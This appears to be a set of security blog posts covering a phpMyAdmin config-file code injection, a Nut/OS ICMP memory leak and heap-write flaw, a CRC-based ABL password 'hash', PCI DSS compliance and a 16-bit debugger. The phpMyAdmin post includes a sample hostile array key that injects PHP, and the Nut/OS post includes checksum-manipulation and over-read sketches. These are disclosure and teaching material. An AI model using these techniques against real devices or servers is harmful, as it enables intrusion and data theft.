While the most obvious inputs, those set by the configuration fields, were escaped properly, other attacker accessible data was not. The script passes PHP serialized data back and forth through the configuration parameter. When a save action is performed, this data is then written as PHP variables to the configuration file. The data contains associative arrays with key and value pairs. On output, the values are properly escaped using add_slashes, however the keys that are also output are not filtered. By modifying the array keys in the serialized data passed to a save POST request, the key name can be escaped and arbitrary PHP code injected. If config/ is writable by the web server user, the config.inc.php file is written to it and can be executed directly out of the document root.
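The general failure mode can be shown with a small Python sketch. It is not the phpMyAdmin code: the function names and the `$cfg[...]` output format are assumptions chosen for illustration. It only shows why escaping values while leaving keys untouched is not enough when generating source code.

```python
def php_escape(text: str) -> str:
    """Escape backslashes and single quotes for a single-quoted PHP string."""
    return text.replace("\\", "\\\\").replace("'", "\\'")


def emit_config_unsafe(settings: dict) -> str:
    """Escapes only the values; keys are written out verbatim."""
    return "\n".join(
        "$cfg['%s'] = '%s';" % (key, php_escape(value))
        for key, value in settings.items()
    )


def emit_config_safe(settings: dict) -> str:
    """Escapes keys and values alike."""
    return "\n".join(
        "$cfg['%s'] = '%s';" % (php_escape(key), php_escape(value))
        for key, value in settings.items()
    )


# A hostile key that closes the array index and appends its own statement.
hostile = {"x']; echo 'injected'; //": "value"}
unsafe_output = emit_config_unsafe(hostile)
safe_output = emit_config_safe(hostile)
```

In the unsafe output the key terminates the quoted index early, so the text that follows is parsed as code; in the safe output the same key stays inside the string literal.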

The issue was disclosed to the phpMyAdmin team and they did an amazing job responding to this disclosure with a patch out in less than 24 hours!

Lessons learned? Anytime you are programmatically generating code (be it HTML, JavaScript, PHP, etc.) ensure that your output is properly filtered and make sure all installation scripts and unneeded administration tools are removed.

References:
Advisory: http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
Patch: http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin?view=rev&revision=12301
CVE: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1151


Response to Visa’s Chief Enterprise Risk Officer comments on PCI DSS

March 27, 2009

Visa’s Chief Enterprise Risk Officer, Ellen Richey, recently presented at the Visa Security Summit on March 19th. One of the valuable points in her presentation was her defense of the value of implementing PCI DSS to protect against data theft. In addition, Ellen Richey spoke about the challenge organizations face, not only in becoming compliant, but in proactively maintaining compliance, defending against attacks and protecting sensitive information.

Recent compromises of payment processors and merchants that were stated to be PCI compliant have brought criticism to the PCI program. Our views are strongly aligned with the views presented by Ellen Richey. While the current PCI program requires an annual audit, this audit is simply an annual health-check. Think of the PCI audit as a state vehicle inspection: even though everything on your car checks out at the time of the inspection, nothing prevents your brake lights from going out days later. You would still have a valid inspection sticker, but you would no longer be in compliance with safety requirements. It is the owner’s responsibility to ensure the car is maintained appropriately. Similarly in PCI, it is the company’s responsibility to ensure the effectiveness and maintenance of controls to protect their data in an ongoing manner.

Ellen Richey also mentioned increased collaboration with the payment card industry, merchants and consumers. Collaboration is a key step to implementing the technology and processes necessary to continue reducing fraud and data theft. From a merchant, service provider and payment processor perspective, new technologies and programs will continue to reduce transaction risk, but, today, there are areas where these organizations need to proactively improve. The PCI DSS standard provides guidance around the implementation of controls to protect data. In addition to protecting data, however, merchants, service providers and processors need to proactively address their ability to detect attacks and be prepared to respond effectively in the event of a compromise. These are two areas that are not currently adequately addressed by the PCI DSS and are areas where we continue to see organizations lacking.

See the following link to the Remarks by Ellen Richey, Chief Enterprise Risk Officer, Visa Inc. at the Visa Security Summit, March 19, 2009:

http://www.corporate.visa.com/md/dl/documents/downloads/EllenRichey09SummitRemarks.pdf


Exploiting Embedded Devices (Part 1)

November 17, 2008

Recently we have been assessing an increasing number of embedded devices. Seeing as the methods for carrying out this type of assessment are not at all well defined, I am starting a series of posts discussing vulnerabilities and exploitation on embedded platforms.

In recent years the exploitation of common vulnerability classes on the most popular platforms has become increasingly difficult. Although vulnerabilities are still common, especially in client-side applications, exploiting these vulnerabilities often becomes a complex matter of bypassing multiple protection mechanisms including stack cookies, heap verification, and data execution prevention. However, with the move towards miniaturization, products are increasingly giving up these protections and moving to largely untested platforms. Often the base libraries and operating systems chosen for these devices contain trivially exploitable vulnerabilities.

Several months ago I assessed a product which included a networked device based on Nut/OS. This minimal operating system describes itself as follows:

Nut/OS is an intentionally simple RTOS for the ATmega128, which provides a minimum of services to run Nut/Net, the TCP/IP stack. It's features include:
+  Non preemptive multithreading.
+  Events.
+  Periodic and one-shot timers.
+  Dynamic heap memory allocation.
+  Interrupt driven streaming I/O.

Main features of the TCP/IP stack are:
+  Base protocols ARP, IP, ICMP, UDP and TCP.
+  User protocols DHCP, DNS and HTTP.
+  Socket API.
+  Host, net and default routing.
+  Interrupt driven Ethernet driver.

While assessing the device, one of the most exposed components was the network stack. Some discussion of the network stack of this minimal operating system is in order. The vulnerability I will discuss has now been patched but the vulnerable version of the operating system can be downloaded here. An incoming IP packet is passed from the device driver into NutEtherInput() and on into NutIpInput() where it is demuxed to determine its protocol and passed to the appropriate component. Within NutIpInput(), on line 187 of net/ipin.c, the length of the IP header is calculated and used without being verified for sanity. The header length field is a 4-bit value that counts 32-bit words, so it is multiplied by 4 to obtain the length in bytes. Later, on lines 250, 251, and 252, several lengths are calculated based on this value as well as on the unchecked length for the entire packet. This vulnerability leads to a number of interesting conditions throughout the network stack where pointers to protocol headers and data are calculated based on incorrect IP header lengths.

void NutIpInput(NUTDEVICE * dev, NETBUF * nb) {
...
ip_hdrlen = ip->ip_hl * 4;
if (ip_hdrlen < sizeof(IPHDR)) {
NutNetBufFree(nb);
return;
}
...
nb->nb_nw.sz = ip_hdrlen;
nb->nb_tp.vp = ((char *) ip) + (ip_hdrlen);
nb->nb_tp.sz = htons(ip->ip_len) - (ip_hdrlen);
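To make the arithmetic concrete, here is a small Python sketch that mirrors the calculations in the excerpt and then adds the bounds checks a stricter parser might perform. The function names are hypothetical and the checks are my own assumption of what reasonable validation looks like, not the actual Nut/OS patch.

```python
import struct

IPHDR_MIN = 20  # size in bytes of an IPv4 header without options


def transport_view(packet: bytes) -> tuple:
    """Mirror the excerpt: return (offset, size) of the transport payload."""
    ip_hdrlen = (packet[0] & 0x0F) * 4           # 4-bit IHL, in 32-bit words
    (ip_len,) = struct.unpack_from("!H", packet, 2)
    return ip_hdrlen, ip_len - ip_hdrlen         # both attacker-controlled


def checked_transport_view(packet: bytes) -> tuple:
    """Same calculation, but every length is checked against the buffer."""
    if len(packet) < IPHDR_MIN:
        raise ValueError("packet shorter than an IP header")
    ip_hdrlen, size = transport_view(packet)
    ip_len = ip_hdrlen + size
    if ip_hdrlen < IPHDR_MIN or ip_hdrlen > len(packet):
        raise ValueError("implausible IP header length")
    if ip_len < ip_hdrlen or ip_len > len(packet):
        raise ValueError("total length disagrees with received data")
    return ip_hdrlen, size


def build_packet(ihl: int, total_len: int, payload: bytes) -> bytes:
    """Build a 20-byte header (most fields zeroed) followed by the payload."""
    return bytes([0x40 | ihl, 0]) + struct.pack("!H", total_len) + bytes(16) + payload
```

With an honest header (IHL of 5, total length of 28, 8 bytes of payload) both functions agree on an offset of 20 and a size of 8. Claiming an IHL of 15 moves the transport offset to byte 60, well past the end of a 28-byte packet, which is the condition the unchecked code goes on to trust.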

The most interesting of these, from the perspective of exploitation, are strangely in one of the simplest protocol handlers: ICMP. This arises largely from the fact that the buffers allocated for incoming echo requests are reused for the responses. The responses are sent through NutIcmpOutput() in net/icmpout.c. To exploit this we need data to be written through a pointer which can be pushed forward into another chunk of heap memory by specifying an incorrect IP header length. Only two writes meet these criteria. The first is the type field of the ICMP packet, which in this case will always be zero (the type of an echo reply). Although it may be possible to gain execution in some cases with the ability to overwrite heap memory with a zero byte, in this case there is a more interesting alternative. The second field which is written is a checksum of the ICMP portion of the packet, which is data that we at least partly control. So, by specifying an IP header length which is larger than the true length (typically 5) and controlling the calculated checksum, we can write an arbitrary 2 bytes at any 32-bit boundary within 9 words of the end of our packet in memory (the largest IP header length, 15, minus the sum of the smallest IP header length, 5, and the size of the ICMP header, 1).

int NutIcmpOutput(uint8_t type, uint32_t dest, NETBUF * nb) {
ICMPHDR *icp;
uint16_t csum;
icp = (ICMPHDR *) nb->nb_tp.vp;
icp->icmp_type = type;
icp->icmp_cksum = 0;
csum = NutIpChkSumPartial(0, nb->nb_tp.vp, nb->nb_tp.sz);
icp->icmp_cksum = NutIpChkSum(csum, nb->nb_ap.vp, nb->nb_ap.sz);
return NutIpOutput(IPPROTO_ICMP, dest, nb);
}
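“Controlling the calculated checksum” comes down to simple ones’ complement arithmetic. The Python sketch below shows only that arithmetic: given data whose checksum field is zeroed, it finds one 16-bit word to append so that the standard Internet checksum comes out to a chosen value. The function names are hypothetical, and the sketch ignores the complication that, with a shifted header pointer, some of the bytes being summed are heap contents rather than attacker data.

```python
import struct


def word_sum(data: bytes) -> int:
    """Plain integer sum of the big-endian 16-bit words in data."""
    if len(data) % 2:
        data += b"\x00"
    return sum(struct.unpack("!%dH" % (len(data) // 2), data))


def internet_checksum(data: bytes) -> int:
    """Ones' complement of the ones' complement sum (RFC 1071 style)."""
    total = word_sum(data)
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)  # end-around carry
    return ~total & 0xFFFF


def fixup_word(data: bytes, target: int) -> int:
    """Word to append to even-length data so its checksum equals target.

    0xFFFF is excluded: it would require every summed word to be zero.
    """
    if len(data) % 2 or not 0 <= target < 0xFFFF:
        raise ValueError("need even-length data and a target below 0xFFFF")
    desired_sum = ~target & 0xFFFF               # folded sum we must reach
    word = (desired_sum - word_sum(data)) % 0xFFFF
    return word or 0xFFFF                        # 0xFFFF also acts as zero
```

For example, appending `fixup_word(header, 0xBEEF)` to an ICMP header with a zeroed checksum field makes `internet_checksum` return 0xBEEF for the combined bytes.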

This leads us to another difficulty, the Nut/OS heap implementation (specifically the use of singly linked lists). I will go into this in more detail in another post but for now I want to talk about another vector for the exploitation of this vulnerability. In many cases the rather limited memory of an embedded device contains information that would be useful to an attacker. Things like encryption keys and passwords are all stored in the same address space that the network stack is operating on. If you have been following along you may see where I am going with this. When we specify a packet length (not ip->ip_hl but instead ip->ip_len) in the IP header of an ICMP echo request that is larger than the actual packet sent, a condition results where the excess length for the echo response is pulled from the memory directly after the allocated buffer. By sending an ICMP echo request with no data and a long length we can effectively read chunks of memory from the vulnerable device. To obtain the maximum amount of memory it is possible, by forcing allocations and deallocations using particulars of the TCP stack, to change the location where the packet buffer is allocated.
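The over-read can be modeled with a toy Python simulation. Nothing here is Nut/OS code: the flat “heap”, the offsets, and the function names are all invented for illustration. It simply contrasts a reply that trusts the claimed length with one that clamps it to what was actually received.

```python
def echo_reply_trusting(heap: bytes, buf_off: int, received: int, claimed: int) -> bytes:
    """Reply payload when the stack believes the length in the IP header."""
    return bytes(heap[buf_off:buf_off + claimed])


def echo_reply_clamped(heap: bytes, buf_off: int, received: int, claimed: int) -> bytes:
    """Reply payload when the claimed length is limited to the bytes received."""
    return bytes(heap[buf_off:buf_off + min(claimed, received)])


# Toy heap: a 4-byte echo payload followed directly by unrelated data.
heap = bytearray(64)
heap[8:12] = b"PING"
heap[12:23] = b"hunter2-key"

leaked = echo_reply_trusting(heap, buf_off=8, received=4, claimed=15)
clamped = echo_reply_clamped(heap, buf_off=8, received=4, claimed=15)
```

Here `leaked` contains the echo payload plus the neighbouring eleven bytes, while `clamped` contains only the four bytes that were actually sent.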

Visualizing the attack with ninjas

By manipulating the heap it is possible to rebuild large sections of the vulnerable device’s memory based on the data segment of the returned ICMP responses. In many cases this will give the attacker everything they need to further compromise the system. Even when no critical encryption key or password that can be leaked exists in memory, this attack is extremely useful in helping to facilitate a more typical heap corruption exploit.

I want to touch briefly on the steps that can be taken by device manufacturers to avoid this type of vulnerability. It is not sufficient to assume that because it is an embedded device it will not be attacked. As the popularity of deploying this type of system on the internet continues to grow, greater numbers of attackers will focus on these platforms simply because exploitation is often easier. When deploying internet-enabled devices the same precautions should be taken as with more conventional platforms like Windows and Linux. During the design process, base libraries and operating systems should be vetted through security review prior to inclusion in a product. I expect to see much more research into these platforms as ethernet adapters and wireless interfaces are added to more and more devices.


Crypto Pet Peeves: Hashing…Encoding…It’s All The Same, Right?

August 25, 2008

Patrick Toomey

© 2008 Neohapsis

We all know cryptography is hard. Time and time again we in the security community give advice that goes something like, “Unless you have an unbelievably good reason for developing your own cryptography, don’t!”. Even if you think you have an unbelievably good reason I would still take pause and make sure there is no other alternative. Nearly every aspect of cryptography is painstakingly difficult: developing new crypto primitives is hard, correctly implementing them is nearly as hard, and even using existing crypto APIs can be fraught with subtlety. As discussed in a prior post, Seed Racing, even fairly simple random number generation is prone to developer error. Whenever I audit source I keep my eyes open for unfamiliar crypto code. Such was the case on a recent engagement; I found myself reviewing an application in a language that I was less familiar with: Progress ABL.

Progress ABL is similar to a number of other 4GL languages, simplifying development given the proper problem set. Most notably, Progress ABL allows for rapid development of typical business CRUD applications, as the language has a number of features that make database interactions fairly transparent. For those of you interested to learn more, the language reference manual can be found on Progress’ website.

As I began my review of the application I found myself starting where I usually do: staring at the login page. The application was a fairly standard web app that required authentication via login credentials before accessing the sensitive components of the application. Being relatively unfamiliar with ABL, I was curious how they would handle session management. Sure enough, just as with many other web apps, the application set a secure cookie that uniquely identifies my session upon login. However, I noticed that the session ID was relatively short (sixteen lower/upper case letters and four digits). I decided to pull down a few thousand of the tokens to see if I noticed any anomalies. The first thing I noticed was that the four digit number on the end was obviously not random, as values tended to repeat, cluster together, etc. So, the security of the session ID must lie in the sixteen characters that precede the four digits. However, even the sixteen characters did not look so random. Certain letters appeared to occur more than others. Certain characters seemed to follow other characters more than others. But, this was totally unscientific; strange patterns can be found in any small sample of data. So, I decided to do a bit more scientific investigation into what was going on.

Just to confirm my suspicions I coded up a quick Python script to pull down a few thousand tokens and count the frequency of each character in the token. Several minutes later I had a nice graph in Excel.
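The counting half of such a script is only a few lines. The sketch below is not the original script: it assumes the tokens have already been collected into a list, and the per-character Shannon entropy it computes is a crude summary of my own choosing, far simpler than the tests Burp runs.

```python
import math
from collections import Counter


def char_frequencies(tokens) -> Counter:
    """Count how often each character appears across all tokens."""
    counts = Counter()
    for token in tokens:
        counts.update(token)
    return counts


def entropy_per_char(counts: Counter) -> float:
    """Shannon entropy, in bits per character, of the observed distribution."""
    total = sum(counts.values())
    return -sum(
        (count / total) * math.log2(count / total) for count in counts.values()
    )
```

The output of `char_frequencies(tokens).most_common()` can be pasted into a spreadsheet to draw the histogram. For 52 equally likely upper and lower case letters, `entropy_per_char` would approach log2(52), roughly 5.7 bits, so a markedly lower figure hints at a skewed distribution.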

Histogram of Encode Character Frequency

Ouch! That sure doesn’t look very random. So, I opened up Burp Proxy and used its Sequencer to pull down a few thousand more session cookies. The Burp Sequencer has support for running a number of tests, including a set of FIPS-compliant statistical tests for randomness. To obtain a statistically significant result Burp analyzes a sample size of 20,000 tokens. Since I saw that the four-digit number at the end of the session ID provided little to no entropy, I discarded it from the analysis. It seemed obvious that the sixteen-character sequence was generated using some sort of cryptographic hash, and the four-digit number was generated in some other way. I was more interested in the entropy provided by the hash. So, after twenty minutes of downloading tokens, I let Burp crunch the numbers. About 25 seconds later Burp returned an entropy value of 0 bits. Burp returned a graph that looked like the one below, showing the entropy of the data at various significance levels.

Encode Entropy Estimation

Hmmm, maybe Burp is broken. I was pretty sure I had successfully used the Burp Sequencer before. Maybe it was user error, a bug in the current version, who knows. I decided that a control was needed, just to ensure that the tool was working the way I thought it should. So, I wrote a bit more Python to simply print the hex-encoded value of a SHA1 hash on the numbers 1-20,000. I loaded this data into Burp and analyzed the data set. Burp estimated the entropy at 153 bits. Just to compare with the prior results, here is the distribution graph and the Burp entropy results for the SHA1 output:

Histogram of SHA1 Character Frequency

SHA1 Entropy Estimation

I repeated the same test against a set of JSESSIONID tokens and found a similarly acceptable result. Ok, so the Burp Sequencer seems to be working.
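The SHA1 control set described above is easy to reproduce. This sketch assumes each number is hashed as its decimal ASCII string, which is a guess on my part since the encoding is not spelled out; the function name is likewise hypothetical.

```python
import hashlib


def sha1_control_tokens(count: int = 20000) -> list:
    """Hex-encoded SHA1 digests of the decimal strings "1" through count."""
    return [
        hashlib.sha1(str(number).encode("ascii")).hexdigest()
        for number in range(1, count + 1)
    ]
```

Writing `"\n".join(sha1_control_tokens())` to a file gives one 40-character token per line, which can then be loaded into the Sequencer for manual analysis.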

So, I next went hunting for the session token generation code in the application. After a little grepping I found the function for generating new session tokens. Ultimately the function took a number of values and ran them through a function called “ENCODE”. Hmmm, ENCODE, that didn’t sound familiar. Some more grepping through the source did not reveal any function definitions, so I assumed the function must be part of the standard library for ABL. Sure enough, on page 480 of the language reference manual there was a description of the ENCODE function.

“Encodes a source character string and returns the encoded character string result”

The documentation then goes on to state:

“The ENCODE function performs a one-way encoding operation that you cannot reverse.  It is useful for storing scrambled copies of passwords in a database. It is impossible to determine the original password by examining the database. However, a procedure can prompt a user for a password, encode it, and compare the result with the stored, encoded password to determine if the user supplied the correct password.”

That is the least committal description of a hash function I’ve ever had the pleasure of reading. It turns out the application, as well as a third party library the application depends upon, uses this function for generating session tokens, storing passwords, and generating encryption keys. For the sake of reproducibility I wanted to be sure my data was not the result of some strange artifact in their environment. I installed the ABL runtime locally and coded up a simple ABL script to call ENCODE on the numbers 1-20000. I reran the Burp Sequencer and got the exact same result, 0 bits.

At this point I was fairly sure that ENCODE was flawed from a hashing perspective. A good quality secure hash function, regardless of how correlated the inputs are (as the numbers 1-20000 obviously would be), should produce output that is indistinguishable from truly random values (see Cryptographic Hash Functions and Random Oracle Model for more information). ENCODE clearly does not meet this definition of a secure hash function. But, 0 bits, that seems almost inconceivably flawed. So, giving them the benefit of the doubt, I wondered if the result was dependent on the input. In other words, I conjectured that ENCODE might perform some unsophisticated “scrambling” operation on the input, and thus input with low entropy will have low entropy on the output. Conversely, input with high entropy might retain its entropy on output. This still wouldn’t excuse the final result, but I was curious nonetheless. My final test was to use the output of my SHA1 results and feed them each through the ENCODE function. Since the output of the SHA1 function contains high entropy I conjectured that ENCODE, despite its obvious flaws, might retain this entropy. The results are shown below:

Histogram of SHA1 then Encode Character Frequency

SHA1 then Encode Entropy Estimation

ENCODE manages to transform an input with approximately 160 bits of entropy into an output that, statistically speaking, contains 0 bits of entropy. In fact, the frequency distribution of the character output is nearly identical to the first graph in this post.

This brings me back to my opening statement, “Unless you have an unbelievably good reason for developing your own cryptography, don’t!”. I can’t figure out why this ENCODE function exists. Surely the ABL library has support for a proper hash function like SHA1, right? Yes, in fact it does. The best explanation I could come up with is that it is a legacy API call. If that is the case then the call should be deprecated and/or documented as suitable only in cases where security is of no importance. The current API documentation does the exact opposite, encouraging developers to use the function for storing passwords. Cryptography is hard, even for those of us who understand the subtlety involved. Anything that blurs the line between safe and unsafe behavior only makes the burden on developers even greater.

It is unclear, based on this analysis, how much effort it would require to find collisions in ABL’s ENCODE function. But, even this simple statistical analysis should be enough for anyone to steer clear of its use for anything security related. If you are an ABL developer I would recommend that you try replacing ENCODE with something else. As a trivial example, you could try: HEX-ENCODE(SHA1-DIGEST(input)). Obviously you need to test and refactor any code that this breaks. But, you can at least be assured that SHA1 is relatively secure from a hashing perspective. That said, you might want to start looking at SHA-256 or SHA-512, given the recent chinks in the armor of SHA1.

Unfortunately, it does not appear that ABL has support for these more contemporary SHA functions in their current release.

Ok….slowly stepping down off my soapbox now.   Bad crypto just happens to be one of my pet peeves.

Footnote:

Just before posting this blog entry I decided to email Progress to see if they were aware of the behavior of the ENCODE function. After a few back-and-forth emails I eventually got an email that described the ENCODE function as using a CRC-16 to generate its output (it is not the direct output, but CRC-16 is the basic primitive used to derive the output). Unfortunately, CRCs were never meant to have any security guarantees. CRCs do an excellent job of detecting accidental bit errors in a noisy transmission medium. However, they provide no guarantees if a malicious user tries to find a collision. In fact, maliciously generating inputs that produce identical CRC outputs is fairly trivial. As an example, the linearity of the CRC-32 algorithm was noted as problematic in an analysis of WEP. Thus, despite the API doc recommendation, I would highly recommend that you not use ENCODE as a means of securely storing your users’ passwords.
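The linearity mentioned above is easy to demonstrate with the CRC-32 in Python’s zlib module. This sketch says nothing about how ENCODE itself is built; the function names are hypothetical and the messages are made up. It shows that the CRC of a tampered message can be predicted from the original CRC and the bit changes alone, without knowing the original message.

```python
import zlib


def xor_bytes(left: bytes, right: bytes) -> bytes:
    """Byte-wise XOR of two equal-length strings."""
    return bytes(a ^ b for a, b in zip(left, right))


def predict_crc(original_crc: int, delta: bytes) -> int:
    """CRC-32 of (message XOR delta), given only the message's CRC-32.

    CRC-32 is affine over XOR for equal-length inputs:
    crc(m ^ d) == crc(m) ^ crc(d) ^ crc(zeros of the same length).
    """
    return original_crc ^ zlib.crc32(delta) ^ zlib.crc32(bytes(len(delta)))


original = b"pay alice 0100 dollars"
tampered = b"pay alice 9100 dollars"
delta = xor_bytes(original, tampered)
predicted = predict_crc(zlib.crc32(original), delta)
```

Here `predicted` equals `zlib.crc32(tampered)`, which is exactly the property a keyed or cryptographic hash is designed not to have.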


16-bit debugger goodness

August 2, 2008

It’s Saturday around noon. A friend is building a new server and wants to add 8 gigs of RAM to his MSI motherboard but needs to flash the motherboard first. I’m bored and it seems easy, plus he hasn’t seen Afro Samurai, so I figure we’ll upgrade his motherboard, watch some anime, and it will be a Saturday afternoon well spent.

Well, turns out the instructions say use a floppy…guess what? He has no floppy drives. He has ten computers counting the laptop I brought but no floppy drives. Ah ok, well this is for a Linux server but we supposedly need Windows to install. He installed Windows before I got there but no go. The software won’t run, and without a floppy drive we can’t make a DOS floppy. Believe it or not I keep a small win98boot.img file on my server for just such a reason but without a floppy I’ve got nothing.

So I go back to my house where I have tons of computers, all with floppies.  Now that I think about it I have no idea why I always add a floppy when I build a machine… but I do.  Plus I have extra drives so I grab one and some blank disks.  Hey I still have blanks from the days of Slackware boot floppies, and Novell server.exes… yeah, you remember ;)

So get this, the motherboard doesn’t boot with the floppy attached. Whatever. We figure it should be trivial to modify the installer to use another drive letter rather than A:. We divided our efforts. He goes to task making a USB DOS bootable thumbdrive and I go to modify the motherboard’s installer.

As you can probably guess from this post, it was a 16-bit installer. No problem, right? I do 32-bit in Olly and IDA so trivial eh? Nope, only IDA can open such a thing but it can’t run as a debugger. Which wouldn’t be a big deal but the binary is packed. Packed! Yeah for real, 16-bit and packed.

At this stage there is no turning back for me.  Meanwhile he already has his thumbdrive in DOS mode.  But I can’t debug 16-bits even in IDA.  Huh, who knew?  Well probably a lot of you but I didn’t.  So I figure, well I start up debug.exe and do it from there…nope.  No breakpoint support or anything useful.  Hmmmm, well I stumble on GRDB.  It stands for ‘Get Real’ Debugger and I have to say I was impressed.  It can handle 16-bit apps as well as 32-bit functionality.  It actually has a lot of cool functionality like PCI bus support but I didn’t need that.  What it did have was breakpoints, single stepping and step over commands.  Plus in comments it would show if a jump was taken or the contents of ES:[ax+dx].  GRDB, I love you!  :)   And just for icing on the cake they have ANSI colors.  Now how can you not love that?

GRDB comes with source: All in ASM and it can be compiled with MASM. All code is licensed under the GPL as well! Woot! By now my friend has already updated his motherboard and is installing Linux but I’m still in fascinated mode. I missed the RE scene from back in the 16-bit DOS days. Granted I used debug.exe to change binaries but it was based on offsets about which people had told me. I was not in the scene that set the precedent for debuggers today. Now to only modify the binary to support Ruby and a .gdbinit script… ;)

But if you are stuck with a 16-bit app I recommend GRDB, or if you want to write a packer that modern debuggers choke on…go old school.  (PS.  I laughed when I unpacked it and fired up ImpRec just to see NTVDM.EXE was all that was running :P )  I forget how spoiled I am nowadays but this Saturday afternoon I found a surprisingly useful gem.

–Craig